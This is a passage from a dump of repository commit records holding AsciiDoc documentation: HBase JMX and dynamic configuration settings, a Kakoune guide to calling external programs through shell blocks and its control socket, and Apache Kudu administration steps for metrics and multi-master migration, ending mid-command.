copy jconsole.cert to jconsole client machine, import it to jconsoleKeyStore\nkeytool -import -alias jconsole -keystore jconsoleKeyStore -file jconsole.cert\n----\n\nAnd then update _hbase-env.sh_ like below:\n\n[source,bash]\n----\nexport HBASE_JMX_BASE=\"-Dcom.sun.management.jmxremote.ssl=true \\\n -Djavax.net.ssl.keyStore=\/home\/tianq\/myKeyStore \\\n -Djavax.net.ssl.keyStorePassword=your_password_in_step_1 \\\n -Dcom.sun.management.jmxremote.authenticate=true \\\n -Dcom.sun.management.jmxremote.password.file=your_password file \\\n -Dcom.sun.management.jmxremote.access.file=your_access_file\"\n\nexport HBASE_MASTER_OPTS=\"$HBASE_MASTER_OPTS $HBASE_JMX_BASE \"\nexport HBASE_REGIONSERVER_OPTS=\"$HBASE_REGIONSERVER_OPTS $HBASE_JMX_BASE \"\n----\n\nFinally start `jconsole` on the client using the key store:\n\n[source,bash]\n----\njconsole -J-Djavax.net.ssl.trustStore=\/home\/tianq\/jconsoleKeyStore\n----\n\nNOTE: To enable the HBase JMX implementation on Master, you also need to add below property in _hbase-site.xml_:\n\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.master.classes<\/name>\n <value>org.apache.hadoop.hbase.JMXListener<\/value>\n<\/property>\n----\n\nThe corresponding properties for port configuration are `master.rmi.registry.port` (by default 10101) and `master.rmi.connector.port` (by default the same as registry.port)\n\n[[dyn_config]]\n== Dynamic Configuration\n\nSince HBase 1.0.0, it is possible to change a subset of the configuration without requiring a server restart.\nIn the HBase shell, there are new operators, `update_config` and `update_all_config` that will prompt a server or all servers to reload configuration.\n\nOnly a subset of all configurations can currently be changed in the running server.\nHere are those configurations:\n\n.Configurations support dynamically change\n[cols=\"1\",options=\"header\"]\n|===\n| Key\n| hbase.ipc.server.fallback-to-simple-auth-allowed\n| hbase.cleaner.scan.dir.concurrent.size\n| hbase.regionserver.thread.compaction.large\n| hbase.regionserver.thread.compaction.small\n| hbase.regionserver.thread.split\n| hbase.regionserver.throughput.controller\n| hbase.regionserver.thread.hfilecleaner.throttle\n| hbase.regionserver.hfilecleaner.large.queue.size\n| hbase.regionserver.hfilecleaner.small.queue.size\n| hbase.regionserver.hfilecleaner.large.thread.count\n| hbase.regionserver.hfilecleaner.small.thread.count\n| hbase.regionserver.flush.throughput.controller\n| hbase.hstore.compaction.max.size\n| hbase.hstore.compaction.max.size.offpeak\n| hbase.hstore.compaction.min.size\n| hbase.hstore.compaction.min\n| hbase.hstore.compaction.max\n| hbase.hstore.compaction.ratio\n| hbase.hstore.compaction.ratio.offpeak\n| hbase.regionserver.thread.compaction.throttle\n| hbase.hregion.majorcompaction\n| hbase.hregion.majorcompaction.jitter\n| hbase.hstore.min.locality.to.skip.major.compact\n| hbase.hstore.compaction.date.tiered.max.storefile.age.millis\n| hbase.hstore.compaction.date.tiered.incoming.window.min\n| hbase.hstore.compaction.date.tiered.window.policy.class\n| hbase.hstore.compaction.date.tiered.single.output.for.minor.compaction\n| hbase.hstore.compaction.date.tiered.window.factory.class\n| hbase.offpeak.start.hour\n| hbase.offpeak.end.hour\n| hbase.oldwals.cleaner.thread.size\n| hbase.procedure.worker.keep.alive.time.msec\n| hbase.procedure.worker.add.stuck.percentage\n| hbase.procedure.worker.monitor.interval.msec\n| hbase.procedure.worker.stuck.threshold.msec\n| hbase.regions.slop\n| hbase.regions.overallSlop\n| 
hbase.balancer.tablesOnMaster\n| hbase.balancer.tablesOnMaster.systemTablesOnly\n| hbase.util.ip.to.rack.determiner\n| hbase.ipc.server.max.callqueue.length\n| hbase.ipc.server.priority.max.callqueue.length\n| hbase.ipc.server.callqueue.type\n| hbase.ipc.server.callqueue.codel.target.delay\n| hbase.ipc.server.callqueue.codel.interval\n| hbase.ipc.server.callqueue.codel.lifo.threshold\n| hbase.master.balancer.stochastic.maxSteps\n| hbase.master.balancer.stochastic.stepsPerRegion\n| hbase.master.balancer.stochastic.maxRunningTime\n| hbase.master.balancer.stochastic.runMaxSteps\n| hbase.master.balancer.stochastic.numRegionLoadsToRemember\n| hbase.master.loadbalance.bytable\n| hbase.master.balancer.stochastic.minCostNeedBalance\n| hbase.master.balancer.stochastic.localityCost\n| hbase.master.balancer.stochastic.rackLocalityCost\n| hbase.master.balancer.stochastic.readRequestCost\n| hbase.master.balancer.stochastic.writeRequestCost\n| hbase.master.balancer.stochastic.memstoreSizeCost\n| hbase.master.balancer.stochastic.storefileSizeCost\n| hbase.master.balancer.stochastic.regionReplicaHostCostKey\n| hbase.master.balancer.stochastic.regionReplicaRackCostKey\n| hbase.master.balancer.stochastic.regionCountCost\n| hbase.master.balancer.stochastic.primaryRegionCountCost\n| hbase.master.balancer.stochastic.moveCost\n| hbase.master.balancer.stochastic.maxMovePercent\n| hbase.master.balancer.stochastic.tableSkewCost\n|===\n\nifdef::backend-docbook[]\n[index]\n== Index\n\/\/ Generated automatically by the DocBook toolchain.\nendif::backend-docbook[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ecfb71514538a8bd9324beb559ce426bc2a22622","subject":"Update interfacing.asciidoc","message":"Update interfacing.asciidoc\n","repos":"jkonecny12\/kakoune,occivink\/kakoune,ekie\/kakoune,lenormf\/kakoune,occivink\/kakoune,lenormf\/kakoune,alpha123\/kakoune,xificurC\/kakoune,danr\/kakoune,Asenar\/kakoune,Somasis\/kakoune,ekie\/kakoune,zakgreant\/kakoune,zakgreant\/kakoune,alpha123\/kakoune,alpha123\/kakoune,rstacruz\/kakoune,jjthrash\/kakoune,rstacruz\/kakoune,danielma\/kakoune,xificurC\/kakoune,rstacruz\/kakoune,jjthrash\/kakoune,lenormf\/kakoune,Somasis\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,flavius\/kakoune,Asenar\/kakoune,casimir\/kakoune,danielma\/kakoune,jjthrash\/kakoune,danr\/kakoune,casimir\/kakoune,mawww\/kakoune,zakgreant\/kakoune,mawww\/kakoune,ekie\/kakoune,Asenar\/kakoune,Somasis\/kakoune,Somasis\/kakoune,xificurC\/kakoune,alexherbo2\/kakoune,danielma\/kakoune,xificurC\/kakoune,danr\/kakoune,alexherbo2\/kakoune,occivink\/kakoune,zakgreant\/kakoune,flavius\/kakoune,casimir\/kakoune,alpha123\/kakoune,occivink\/kakoune,rstacruz\/kakoune,mawww\/kakoune,casimir\/kakoune,danr\/kakoune,jkonecny12\/kakoune,jkonecny12\/kakoune,ekie\/kakoune,elegios\/kakoune,lenormf\/kakoune,jjthrash\/kakoune,flavius\/kakoune,jkonecny12\/kakoune,Asenar\/kakoune,elegios\/kakoune,elegios\/kakoune,alexherbo2\/kakoune,elegios\/kakoune,mawww\/kakoune,flavius\/kakoune","old_file":"doc\/interfacing.asciidoc","new_file":"doc\/interfacing.asciidoc","new_contents":"Interfacing Kakoune with external programs\n==========================================\n\nIn order to interact with the external world, Kakoune uses the shell, mainly\nthrough the +%sh{ ... }+ string type, and it's control socket.\n\nBasic interaction\n-----------------\n\nFor synchronous operations, +%sh{ ... }+ blocks are easy to use, they behave\nsimilarly to +$( ... 
)+ shell construct.\n\nFor example, one can echo the current time in Kakoune's status line using:\n\n[source,bash]\n----\n:echo %sh{ date }\n----\n\nFor asynchronous operations, the Kakoune Unix stream socket can be used. This\nis the same socket that Kakoune clients connect to. It is available through\nthe +kak_session+ environment variable: the socket is +\/tmp\/kak-${kak_session}+\n\nFor example, we can echo a message in Kakoune in 10 seconds with:\n\n[source,bash]\n----\n:nop %sh{ (\n sleep 10\n echo \"eval -client '$kak_client' 'echo sleep ended'\" |\n kak -p ${kak_session}\n) > \/dev\/null 2>&1 < \/dev\/null & }\n----\n\n * The +nop+ command is used so that any output from the\n +%sh{ ... }+ block is not interpreted by Kakoune.\n * When writing to the socket, Kakoune has no way to guess in which\n client's context the command should be evaluated. A temporary\n context is used, which does not have any user interface, so if we want\n to interact with the user, we need to use the +eval+ command, with\n its +-client+ option, to send commands to a specific client.\n * For the command to run asynchronously, we wrap it in a sub shell\n with parentheses, redirect its +std{in,err,out}+ to +\/dev\/null+, and\n run it in the background with +&+. Using this pattern, the shell does\n not wait for this sub shell to finish before quitting.\n\nInteractive output\n------------------\n\nA frequent interaction mode is to run a program and display its output\nin a Kakoune buffer.\n\nThe common pattern to do that is to use a fifo buffer:\n\n[source,bash]\n-----\n%sh{\n # Create a temporary fifo for communication\n output=$(mktemp -d -t kak-temp-XXXXXXXX)\/fifo\n mkfifo ${output}\n # run the command detached from the shell\n ( run command here > ${output} ) > \/dev\/null 2>&1 < \/dev\/null &\n # Open the file in Kakoune and add a hook to remove the fifo\n echo \"edit! -fifo ${output} *buffer-name*\n hook buffer BufClose .* %{ nop %sh{ rm -r $(dirname ${output}) } }\"\n}\n-----\n\nThis is a very simple example; most of the time, the echo command will also\ncontain\n\n-----\nset buffer filetype <...>\n-----\n\nso that the hooks written for this filetype take effect.\n\nCompletion candidates\n---------------------\n\nMost of the time, filetype-specific completion should be provided by\nexternal programs.\n\nExternal completions are provided using an option that stores the completions,\nwhich has the following format:\n\n----\nline.column[+len]@timestamp:candidate1[@desc1]:candidate2[@desc2]:...\n----\n\nThe first element of this string list specifies where and when these completions\napply; the others are simply completion candidates, optionally followed by\ndescriptive text (after an `@` separator).\n\nTo effectively use that completion option, add it to the +completers+ option:\n\n----\nset -add buffer completers option=my_option_name\n----\n\n
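For instance, assuming a completer runs while the cursor is at line 14, column 7 of a buffer whose\ntimestamp is 27, it might set the option to a value such as the following (the candidate names and\ndescriptions here are purely illustrative):\n\n----\n14.7@27:first_candidate@first description:second_candidate@second description\n----\n\nAs a completion program may take some time to compute the candidates, it should\nrun asynchronously. 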
In order to do that, the following pattern may be used:\n\n[source,bash]\n-----\n# Declare the option which will store the temporary filename\ndecl str plugin_filename\n# Declare the completion option\ndecl str plugin_completions\n# Add plugin_completions to completers for files of good filetype\nhook global BufSetOption filetype=my_filetype %{\n set -add buff completers option=plugin_completions\n}\n%sh{\n # ask Kakoune to write current buffer to temporary file\n filename=$(mktemp -t kak-temp.XXXXXXXX)\n echo \"set buffer plugin_filename '$filename'\n write '$filename'\"\n}\n# End the %sh{} so that it's output gets executed by Kakoune.\n# Use a nop so that any eventual output of this %sh does not get interpreted.\nnop %sh{ ( # launch a detached shell\n buffer=\"${kak_opt_plugin_filename}\"\n line=\"${kak_cursor_line}\"\n column=\"${kak_cursor_column}\"\n # run completer program and put output in colon separated format\n candidates=$(completer $buffer $line $column | completer_filter)\n # remove temporary file\n rm $buffer\n # generate completion option value\n completions=\"$line.$column@$kak_timestamp:$candidates\"\n # write to Kakoune socket for the buffer that triggered the completion\n echo \"set buffer=${kak_bufname} plugin_completions '$completions'\" |\n kak -p ${kak_session}\n) > \/dev\/null 2>&1 < \/dev\/null & }\n-----\n","old_contents":"Interfacing Kakoune with external programs\n==========================================\n\nIn order to interact with the external world, Kakoune uses the shell, mainly\nthrough the +%sh{ ... }+ string type, and it's control socket.\n\nBasic interaction\n-----------------\n\nFor synchronous operations, +%sh{ ... }+ blocks are easy to use, they behave\nsimilarly to +$( ... )+ shell construct.\n\nFor example, one can echo the current time in Kakoune status line using:\n\n[source,bash]\n----\n:echo %sh{ date }\n----\n\nFor asynchronous operations, the Kakoune Unix stream socket can be used. This\nis the same socket that Kakoune clients connect to. It is available through\n+kak_session+ environment variable: the socket is +\/tmp\/kak-${kak_session}+\n\nFor example, we can echo a message in Kakoune in 10 seconds with:\n\n[source,bash]\n----\n:nop %sh{ (\n sleep 10\n echo \"eval -client '$kak_client' 'echo sleep ended'\" |\n kak -p ${kak_session}\n) > \/dev\/null 2>&1 < \/dev\/null & }\n----\n\n * The +nop+ command is used so that any eventual output from the\n +%sh{ ... }+ is not interpreted by Kakoune\n * When writing to the socket, Kakoune has no way to guess in which\n client's context the command should be evaluated. A temporary\n context is used, which does not have any user interface, so if we want\n to interact with the user, we need to use the +eval+ command, with\n it's +-client+ option to send commands to a specific client.\n * For the command to run asynchronously, we wrap it in a sub shell\n with parenthesis, redirect it's +std{in,err,out}+ to +\/dev\/null+, and\n run it in background with +&+. 
Using this pattern, the shell does\n not wait for this sub shell to finish before quitting.\n\nInteractive output\n------------------\n\nIt is a frequent interaction mode to run a program and display it's output\nin a Kakoune buffer.\n\nThe common pattern to do that is to use a fifo buffer:\n\n[source,bash]\n-----\n%sh{\n # Create a temporary fifo for communication\n output=$(mktemp -d -t kak-temp-XXXXXXXX)\/fifo\n mkfifo ${output}\n # run command detached from the shell\n ( run command here > ${output} ) > \/dev\/null 2>&1 < \/dev\/null &\n # Open the file in Kakoune and add a hook to remove the fifo\n echo \"edit! -fifo %{output} *buffer-name*\n hook buffer BufClose .* %{ nop %sh{ rm -r $(dirname ${output}} }\"\n}\n-----\n\nThis is a very simple example, most of the time, the echo command will as\nwell contains\n\n-----\nset buffer filetype <...>\n-----\n\nand some hooks for this filetype will have been written\n\nCompletion candidates\n---------------------\n\nMost of the time, filetype specific completion should be provided by\nexternal programs.\n\nexternal completions are provided using the +completions+ option, which\nhave the following format.\n\n----\nline.column[+len]@timestamp:candidate1:candidate2:...\n----\n\nthe first element of this string list specify where and when this completions\napplies, the others are simply completion candidates.\n\nAs a completion program may take some time to compute the candidates, it should\nrun asynchronously. In order to do that, the following pattern may be used:\n\n[source,bash]\n-----\n# Declare the option which will store the temporary filename\ndecl str plugin_filename\n%sh{\n # ask Kakoune to write current buffer to temporary file\n filename=$(mktemp -t kak-temp.XXXXXXXX)\n echo \"set buffer plugin_filename '$filename'\n write '$filename'\"\n}\n# End the %sh{} so that it's output gets executed by Kakoune.\n# Use a nop so that any eventual output of this %sh does not get interpreted.\nnop %sh{ ( # launch a detached shell\n buffer=\"${kak_opt_plugin_filename}\"\n line=\"${kak_cursor_line}\"\n column=\"${kak_cursor_column}\"\n # run completer program and put output in colon separated format\n candidates=$(completer $buffer $line $column | completer_filter)\n # remove temporary file\n rm $buffer\n # generate completion option value\n completions=\"$line.$column@$kak_timestamp:$candidates\"\n # write to Kakoune socket for the buffer that triggered the completion\n echo \"set buffer=${kak_bufname} completions '$completions'\" |\n kak -p ${kak_session}\n) > \/dev\/null 2>&1 < \/dev\/null & }\n-----\n","returncode":0,"stderr":"","license":"unlicense","lang":"AsciiDoc"} {"commit":"7679f9b7ef70982885c8141aa8136d4a2a237305","subject":"docs: add notes for multi master migration","message":"docs: add notes for multi master migration\n\nChange-Id: I7e469bc23b650f3b99c785311acc665ac20f33ea\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5728\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo 
<866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n[[administration]]\n= Apache Kudu Administration\n\n:author: Kudu Team\n:imagesdir: .\/images\n:icons: font\n:toc: left\n:toclevels: 3\n:doctype: book\n:backend: html5\n:sectlinks:\n:experimental:\n\nNOTE: Kudu is easier to manage with link:http:\/\/www.cloudera.com\/content\/www\/en-us\/products\/cloudera-manager.html[Cloudera Manager]\nthan in a standalone installation. See Cloudera's\nlink:http:\/\/www.cloudera.com\/content\/www\/en-us\/documentation\/betas\/kudu\/latest\/topics\/kudu_installation.html[Kudu documentation]\nfor more details about using Kudu with Cloudera Manager.\n\n== Starting and Stopping Kudu Processes\n\nNOTE: These instructions are relevant only when Kudu is installed using operating system packages\n(e.g. `rpm` or `deb`).\n\ninclude::installation.adoc[tags=start_stop]\n\n== Kudu Web Interfaces\n\nKudu tablet servers and masters expose useful operational information on a built-in web interface,\n\n=== Kudu Master Web Interface\n\nKudu master processes serve their web interface on port 8051. The interface exposes several pages\nwith information about the cluster state:\n\n- A list of tablet servers, their host names, and the time of their last heartbeat.\n- A list of tables, including schema and tablet location information for each.\n- SQL code which you can paste into Impala Shell to add an existing table to Impala's list of known data sources.\n\n=== Kudu Tablet Server Web Interface\n\nEach tablet server serves a web interface on port 8050. 
The interface exposes information\nabout each tablet hosted on the server, its current state, and debugging information\nabout maintenance background operations.\n\n=== Common Web Interface Pages\n\nBoth Kudu masters and tablet servers expose a common set of information via their web interfaces:\n\n- HTTP access to server logs.\n- an `\/rpcz` endpoint which lists currently running RPCs via JSON.\n- pages giving an overview and detailed information on the memory usage of different\n components of the process.\n- information on the current set of configuration flags.\n- information on the currently running threads and their resource consumption.\n- a JSON endpoint exposing metrics about the server.\n- information on the deployed version number of the daemon.\n\nThese interfaces are linked from the landing page of each daemon's web UI.\n\n== Kudu Metrics\n\nKudu daemons expose a large number of metrics. Some metrics are associated with an entire\nserver process, whereas others are associated with a particular tablet replica.\n\n=== Listing available metrics\n\nThe full set of available metrics for a Kudu server can be dumped via a special command\nline flag:\n\n[source,bash]\n----\n$ kudu-tserver --dump_metrics_json\n$ kudu-master --dump_metrics_json\n----\n\nThis will output a large JSON document. Each metric indicates its name, label, description,\nunits, and type. Because the output is JSON-formatted, this information can easily be\nparsed and fed into other tooling which collects metrics from Kudu servers.\n\n=== Collecting metrics via HTTP\n\nMetrics can be collected from a server process via its HTTP interface by visiting\n`\/metrics`. The output of this page is JSON for easy parsing by monitoring services.\nThis endpoint accepts several `GET` parameters in its query string:\n\n- `\/metrics?metrics=<substring1>,<substring2>,...` - limits the returned metrics to those which contain\nat least one of the provided substrings. The substrings also match entity names, so this\nmay be used to collect metrics for a specific tablet.\n\n- `\/metrics?include_schema=1` - includes metrics schema information such as unit, description,\nand label in the JSON output. 
This information is typically elided to save space.\n\n- `\/metrics?compact=1` - eliminates unnecessary whitespace from the resulting JSON, which can decrease\nbandwidth when fetching this page from a remote host.\n\n- `\/metrics?include_raw_histograms=1` - include the raw buckets and values for histogram metrics,\nenabling accurate aggregation of percentile metrics over time and across hosts.\n\nFor example:\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?include_schema=1&metrics=connections_accepted'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"server\",\n \"id\": \"kudu.tabletserver\",\n \"attributes\": {},\n \"metrics\": [\n {\n \"name\": \"rpc_connections_accepted\",\n \"label\": \"RPC Connections Accepted\",\n \"type\": \"counter\",\n \"unit\": \"connections\",\n \"description\": \"Number of incoming TCP connections made to the RPC server\",\n \"value\": 92\n }\n ]\n }\n]\n----\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?metrics=log_append_latency'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"tablet\",\n \"id\": \"c0ebf9fef1b847e2a83c7bd35c2056b1\",\n \"attributes\": {\n \"table_name\": \"lineitem\",\n \"partition\": \"hash buckets: (55), range: [(<start>), (<end>))\",\n \"table_id\": \"\"\n },\n \"metrics\": [\n {\n \"name\": \"log_append_latency\",\n \"total_count\": 7498,\n \"min\": 4,\n \"mean\": 69.3649,\n \"percentile_75\": 29,\n \"percentile_95\": 38,\n \"percentile_99\": 45,\n \"percentile_99_9\": 95,\n \"percentile_99_99\": 167,\n \"max\": 367244,\n \"total_sum\": 520098\n }\n ]\n }\n]\n----\n\nNOTE: All histograms and counters are measured since the server start time, and are not reset upon collection.\n\n=== Collecting metrics to a log\n\nKudu may be configured to periodically dump all of its metrics to a local log file using the\n`--metrics_log_interval_ms` flag. Set this flag to the interval at which metrics should be written\nto a log file.\n\nThe metrics log will be written to the same directory as the other Kudu log files, with the same\nnaming format. After any metrics log file reaches 64MB uncompressed, the log will be rolled and\nthe previous file will be gzip-compressed.\n\nThe log file generated has three space-separated fields. The first field is the word\n`metrics`. The second field is the current timestamp in microseconds since the Unix epoch.\nThe third is the current value of all metrics on the server, using a compact JSON encoding.\nThe encoding is the same as the metrics fetched via HTTP described above.\n\nWARNING: Although metrics logging automatically rolls and compresses previous log files, it does\nnot remove old ones. Since metrics logging can use significant amounts of disk space,\nconsider setting up a system utility to monitor space in the log directory and archive or\ndelete old segments.\n\n== Common Kudu workflows\n\n[[migrate_to_multi_master]]\n=== Migrating to Multiple Kudu Masters\n\nFor high availability and to avoid a single point of failure, Kudu clusters should be created with\nmultiple masters. Many Kudu clusters were created with just a single master, either for simplicity\nor because Kudu multi-master support was still experimental at the time. This workflow demonstrates\nhow to migrate to a multi-master configuration.\n\nWARNING: The workflow is unsafe for adding new masters to an existing multi-master configuration.\nDo not use it for that purpose.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. 
If\nusing Cloudera Manager (CM), the workflow also presupposes familiarity with it.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the migration\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n\n. Decide how many masters to use. The number of masters should be odd. Three or five node master\n configurations are recommended; they can tolerate one or two failures respectively.\n\n. Perform the following preparatory steps for the existing master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameters. Note that if `fs_data_dirs` is set to some directories\n other than the value of `fs_wal_dir`, it should be explicitly included in every command below where\n `fs_wal_dir` is also included.\n* Identify and record the port the master is using for RPCs. The default port value is 7051, but it\n may have been customized using the `rpc_bind_addresses` configuration parameter.\n* Identify the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\nmaster_data_dir:: existing master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\n4aab798a69e94fab8d77069edff28ce0\n----\n+\n* Optional: configure a DNS alias for the master. The alias could be a DNS cname (if the machine\n already has an A record in DNS), an A record (if the machine is only known by its IP address),\n or an alias in \/etc\/hosts. The alias should be an abstract representation of the master (e.g.\n `master-1`).\n+\nWARNING: Without DNS aliases it is not possible to recover from permanent master failures, so\nusing them is highly recommended.\n+\n. Perform the following preparatory steps for each new master:\n* Choose an unused machine in the cluster. The master generates very little load so it can be\n colocated with other data services or load-generating processes, though not with another Kudu\n master from the same configuration.\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n* Choose and record the port the master should use for RPCs.\n* Optional: configure a DNS alias for the master (e.g. `master-2`, `master-3`, etc.).\n\n==== Perform the migration\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Format the data directory on each new master machine, and record the generated UUID. Use the\n following command sequence:\n+\n[source,bash]\n----\n$ kudu fs format --fs_wal_dir=<master_data_dir>\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs format --fs_wal_dir=\/var\/lib\/kudu\/master\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\nf5624e05f40649b79a757629a69d061e\n----\n\n. 
If using CM, add the new Kudu master roles now, but do not start them.\n* If using DNS aliases, override the empty value of the `Master Address` parameter for each role\n (including the existing master role) with that master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Rewrite the master's Raft configuration with the following command, executed on the existing\n master machine:\n+\n[source,bash]\n----\n$ kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_data_dir> <tablet_id> <all_masters>\n----\n+\nmaster_data_dir:: existing master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nall_masters:: space-separated list of masters, both new and existing. Each entry in the list must be\n a string of the form `<uuid>:<hostname>:<port>`\nuuid::: master's previously recorded UUID\nhostname::: master's previously recorded hostname or alias\nport::: master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:master-1:7051 f5624e05f40649b79a757629a69d061e:master-2:7051 988d8ac6530f426cbe180be5ba52033d:master-3:7051\n----\n\n. Modify the value of the `master_addresses` configuration parameter for both existing master and new masters.\n The new value must be a comma-separated list of all of the masters. Each entry is a string of the form `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start the existing master.\n\n. Copy the master data to each new master with the following command, executed on each new master\n machine:\n+\n[source,bash]\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=<master_data_dir> <tablet_id> <existing_master>\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nexisting_master:: RPC address of the existing master and must be a string of the form\n`<hostname>:<port>`\nhostname::: existing master's previously recorded hostname or alias\nport::: existing master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 master-1:7051\n----\n\n. Start all of the new masters.\n+\nWARNING: Skip the next step if using CM.\n+\n. Modify the value of the `tserver_master_addrs` configuration parameter for each tablet server.\n The new value must be a comma-separated list of masters where each entry is a string of the form\n `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start all of the tablet servers.\n\nCongratulations, the cluster has now been migrated to multiple masters! To verify that all masters\nare working properly, consider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line tool. 
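For example, assuming the three masters above are reachable through their DNS aliases, a basic\n check might look like:\n+\n[source,bash]\n----\n$ kudu cluster ksck master-1,master-2,master-3\n----\n+\n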
Help for ksck\n can be viewed via `kudu cluster ksck --help`.\n\n=== Recovering from a dead Kudu Master in a Multi-Master Deployment\n\nKudu multi-master deployments function normally in the event of a master loss. However, it is\nimportant to replace the dead master; otherwise a second failure may lead to a loss of availability,\ndepending on the number of available masters. This workflow describes how to replace the dead\nmaster.\n\nDue to https:\/\/issues.apache.org\/jira\/browse\/KUDU-1620[KUDU-1620], it is not possible to perform\nthis workflow without also restarting the live masters. As such, the workflow requires a\nmaintenance window, albeit a brief one as masters generally restart quickly.\n\nWARNING: Kudu does not yet support Raft configuration changes for masters. As such, it is only\npossible to replace a master if the deployment was created with DNS aliases. See the\n<<migrate_to_multi_master,multi-master migration workflow>> for more details.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing Cloudera Manager (CM), the workflow also presupposes familiarity with it.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the recovery\n\n. Ensure that the dead master is well and truly dead. Take whatever steps needed to prevent it from\n accidentally restarting; this can be quite dangerous for the cluster post-recovery.\n\n. Choose one of the remaining live masters to serve as a basis for recovery. The rest of this\n workflow will refer to this master as the \"reference\" master.\n\n. Choose an unused machine in the cluster where the new master will live. The master generates very\n little load so it can be colocated with other data services or load-generating processes, though\n not with another Kudu master from the same configuration. The rest of this workflow will refer to\n this master as the \"replacement\" master.\n\n. Perform the following preparatory steps for the replacement master:\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n\n. Perform the following preparatory steps for each live master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameter. Please note if you've set fs_data_dirs to some directories\n other than the value of fs_wal_dir, it should be explicitly included in every command below where\n fs_wal_dir is also included.\n* Identify and record the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\nmaster_data_dir:: live master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs dump uuid 